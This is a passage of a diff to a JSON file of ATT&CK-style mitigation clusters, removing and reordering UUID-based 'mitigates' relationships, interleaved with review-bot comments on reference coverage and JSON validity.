- ],
+ "related": [],
"uuid": "676975b9-7e8e-463d-a31e-4ed2ecbfed81",
"value": "Component Firmware Mitigation - T1109"
},
@@ -7217,22 +5501,7 @@
"https://attack.mitre.org/mitigations/T1019"
]
},
- "related": [
- {
- "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "25e53928-6f33-49b7-baee-8180578286f6",
"value": "System Firmware Mitigation - T1019"
},
@@ -7290,15 +5559,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2a8de25c-f743-4348-b101-3ee33ab5871b",
"value": "Data Encrypted Mitigation - T1022"
},
@@ -7316,15 +5577,7 @@
"https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482"
]
},
- "related": [
- {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a13e35cc-8c90-4d77-a965-5461042c1612",
"value": "Shortcut Modification Mitigation - T1023"
},
@@ -7336,15 +5589,7 @@
"https://attack.mitre.org/mitigations/T1204"
]
},
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "548bf7ad-e19c-4d74-84bf-84ac4e57f505",
"value": "User Execution Mitigation - T1204"
},
@@ -7392,13 +5637,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "39a130e1-6ab7-434a-8bd2-418e7d9d6427",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
"tags": [
@@ -7449,7 +5687,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -7484,14 +5722,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
+ "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3",
+ "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -7517,13 +5755,6 @@
]
},
"related": [
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
"tags": [
@@ -7552,13 +5783,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -7573,27 +5797,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
"tags": [
@@ -7628,13 +5831,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
"tags": [
@@ -7642,13 +5838,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec",
"tags": [
@@ -7689,15 +5878,7 @@
"https://attack.mitre.org/mitigations/T1205"
]
},
- "related": [
- {
- "dest-uuid": "451a9977-d255-43c9-b431-66de80130c8c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f6b7c116-0821-4eb7-9b24-62bd09b3e575",
"value": "Port Knocking Mitigation - T1205"
},
@@ -7724,13 +5905,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "06c00069-771a-4d57-8ef5-d3718c1a8771",
"tags": [
@@ -7752,13 +5926,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1126cab1-c700-412f-a510-61f4937bb096",
"tags": [
@@ -7815,13 +5982,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
"tags": [
@@ -7850,13 +6010,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
"tags": [
@@ -7871,13 +6024,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580",
"tags": [
@@ -7991,14 +6137,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "54ca26f3-c172-4231-93e5-ccebcac2161f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "54ca26f3-c172-4231-93e5-ccebcac2161f",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
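Review bot: 51dea151-0898-4a45-967c-3ebee0420484 is dropped from this element and from two others in the patch, so its target technique appears to have been removed upstream; if so, the rest of the cluster should be checked for any remaining reference to it, since each hunk only touches one element's list. Of the two visible swaps, only 55bb4471-ff1f-43b4-88c1-c9384ec47abf is genuinely new; 54ca26f3-c172-4231-93e5-ccebcac2161f merely moves up one slot.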
@@ -8060,13 +6206,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd",
"tags": [
@@ -8088,13 +6227,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -8116,13 +6248,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
"tags": [
@@ -8151,13 +6276,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "818302b2-d640-477b-bf88-873120ce85c4",
"tags": [
@@ -8172,6 +6290,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -8221,13 +6346,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b",
"tags": [
@@ -8249,13 +6367,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a542bac9-7bc1-4da7-9a09-96f69e23cc21",
"tags": [
@@ -8284,13 +6395,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
"tags": [
@@ -8305,34 +6409,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
@@ -8340,13 +6416,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4",
"tags": [
@@ -8396,6 +6465,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
"tags": [
@@ -8438,13 +6514,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ea016b56-ae0e-47fe-967a-cc0ad51af67f",
"tags": [
@@ -8508,20 +6577,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
@@ -8570,13 +6625,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
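Review bot: removing the last element of the array is handled correctly here: the preceding entry's closing "}," is replaced by the unchanged "}" context line, so the array closes without a trailing comma. This is the one shape of edit in the patch where a mechanical removal can break the file, so a full-file JSON validation (python -m json.tool or equivalent) should be part of the merge check rather than relying on eyeballing each hunk.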
@@ -8591,15 +6639,7 @@
"https://attack.mitre.org/mitigations/T1026"
]
},
- "related": [
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "da987565-27b6-4b31-bbcd-74b909847116",
"value": "Multiband Communication Mitigation - T1026"
},
@@ -8611,15 +6651,7 @@
"https://attack.mitre.org/mitigations/T1206"
]
},
- "related": [
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dbf0186e-722d-4a0a-af6a-b3460f162f84",
"value": "Sudo Caching Mitigation - T1206"
},
@@ -8639,13 +6671,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"tags": [
@@ -8681,13 +6706,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
"tags": [
@@ -8744,20 +6762,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "44dca04b-808d-46ca-b25f-d85236d4b9f8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87",
"tags": [
@@ -8857,7 +6861,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -8877,20 +6881,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
"tags": [
@@ -8905,20 +6895,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c",
"tags": [
@@ -8974,13 +6950,6 @@
]
},
"related": [
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292",
"tags": [
@@ -9074,15 +7043,7 @@
"https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings"
]
},
- "related": [
- {
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a1482e43-f3ff-4fbd-94de-ad1244738166",
"value": "Time Providers Mitigation - T1209"
},
@@ -9095,15 +7056,7 @@
"https://attack.mitre.org/mitigations/T1029"
]
},
- "related": [
- {
- "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c0711c8-2a73-48a1-893d-ff88bcd23824",
"value": "Scheduled Transfer Mitigation - T1029"
},
@@ -9123,13 +7076,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -9199,13 +7145,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ae7f3575-0a5e-427e-991b-fe03ad44c754",
"tags": [
@@ -9301,15 +7240,7 @@
"https://skanthak.homepage.t-online.de/sentinel.html"
]
},
- "related": [
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e0703d4f-3972-424a-8277-84004817e024",
"value": "Path Interception Mitigation - T1034"
},
@@ -9326,15 +7257,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d5dce4b9-f1fa-4c03-aff9-ce177246cb64",
"value": "Service Execution Mitigation - T1035"
},
@@ -9354,15 +7277,7 @@
"https://technet.microsoft.com/library/jj852168.aspx"
]
},
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f2cb6ce2-188d-4162-8feb-594f949b13dd",
"value": "Scheduled Task Mitigation - T1053"
},
@@ -9403,12 +7318,26 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "b2d03cea-aec1-45ca-9744-9ee583c1e1cc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
+ },
+ {
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
}
],
"uuid": "f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
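Review bot: b17a1a56-e99c-403c-8948-561df0cffe81 and f232fa7a-025c-4d43-abc7-318e81a73d65 are the same pair that replaced a257ed11-… and ba8e391f-… in an earlier element, so this patch is extending coverage of those two targets across elements, not only adding them once; worth confirming that is intended rather than a duplicated generator output. The closing brace of the b2d03cea-aec1-45ca-9744-9ee583c1e1cc entry correctly changes from "}" to "}," to make room for the appended entry, and both inserts keep the array sorted (b17a… < b2d0… < f232…).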
@@ -9458,13 +7387,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7",
"tags": [
@@ -9493,13 +7415,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
"tags": [
@@ -9605,13 +7520,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "808e6329-ca91-4b87-ac2d-8eadc5f8f327",
"tags": [
@@ -9717,13 +7625,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -9746,15 +7647,7 @@
"https://attack.mitre.org/mitigations/T1037"
]
},
- "related": [
- {
- "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9ab7de33-99b2-4d8d-8cf3-182fa0015cc2",
"value": "Logon Scripts Mitigation - T1037"
},
@@ -9767,13 +7660,6 @@
]
},
"related": [
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
"tags": [
@@ -9787,13 +7673,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "609191bf-7d06-40e4-b1f8-9e11eb3ff8a6",
@@ -9812,15 +7691,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7c39ebbf-244e-4d1c-b0ac-b282453ece43",
"value": "Process Hollowing Mitigation - T1093"
},
@@ -9840,20 +7711,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"tags": [
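Review bot: 6e6845c2-347a-4a6f-a2d1-b74a18ebd352 is dropped from this cluster and again from LSASS Driver Mitigation - T1177 in the hunk at -10872, and nothing in the diff adds it back elsewhere, so the file ends up with no mitigation pointing at that technique; within this excerpt the same holds for 46944654-fcc1-4f63-9dad-628102376586, which is removed only here. If those techniques were revoked upstream the removal is expected, but if they still exist this is a silent loss of coverage, so the regeneration step should check the destination technique's status rather than only diff the relationship set.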
@@ -9881,15 +7738,7 @@
"https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal"
]
},
- "related": [
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ec42d8be-f762-4127-80f4-f079ea6d7135",
"value": "Indicator Blocking Mitigation - T1054"
},
@@ -9906,15 +7755,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c95c8b5c-b431-43c9-9557-f494805e2502",
"value": "Software Packing Mitigation - T1045"
},
@@ -9926,15 +7767,7 @@
"https://attack.mitre.org/mitigations/T1074"
]
},
- "related": [
- {
- "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4320b080-9ae9-4541-9b8b-bcd0961dbbbd",
"value": "Data Staged Mitigation - T1074"
},
@@ -9946,15 +7779,7 @@
"https://attack.mitre.org/mitigations/T1480"
]
},
- "related": [
- {
- "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c61e2da1-f51f-424c-b152-dc930d4f2e70",
"value": "Environmental Keying Mitigation - T1480"
},
@@ -10075,15 +7900,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f6469191-1814-4dbe-a081-2a6daf83a10b",
"value": "Process Discovery Mitigation - T1057"
},
@@ -10101,15 +7918,7 @@
"https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077"
]
},
- "related": [
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5c49bc54-9929-48ca-b581-7018219b5a97",
"value": "Account Discovery Mitigation - T1087"
},
@@ -10125,15 +7934,7 @@
"https://www.us-cert.gov/ncas/alerts/TA13-175A"
]
},
- "related": [
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d45f03a8-790a-4f90-b956-cd7e5b8886bf",
"value": "Valid Accounts Mitigation - T1078"
},
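Review bot: this is the counterpart of the addition in the hunk at -9403: the single edge to b17a1a56-e99c-403c-8948-561df0cffe81 leaves Valid Accounts Mitigation - T1078 and reappears on cluster f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c, so the technique keeps a mitigation. Like the other per-technique mitigations in this diff, the T1078 cluster is retained with `"related": []`; if these clusters are kept only so that existing references to their `uuid` stay resolvable, state that in the commit message, otherwise consider removing them in the same change.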
@@ -10146,15 +7947,7 @@
"https://attack.mitre.org/mitigations/T1079"
]
},
- "related": [
- {
- "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "24478001-2eb3-4b06-a02e-96b3d61d27ec",
"value": "Multilayer Encryption Mitigation - T1079"
},
@@ -10171,15 +7964,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ed202147-4026-4330-b5bd-1e8dfa8cf7cc",
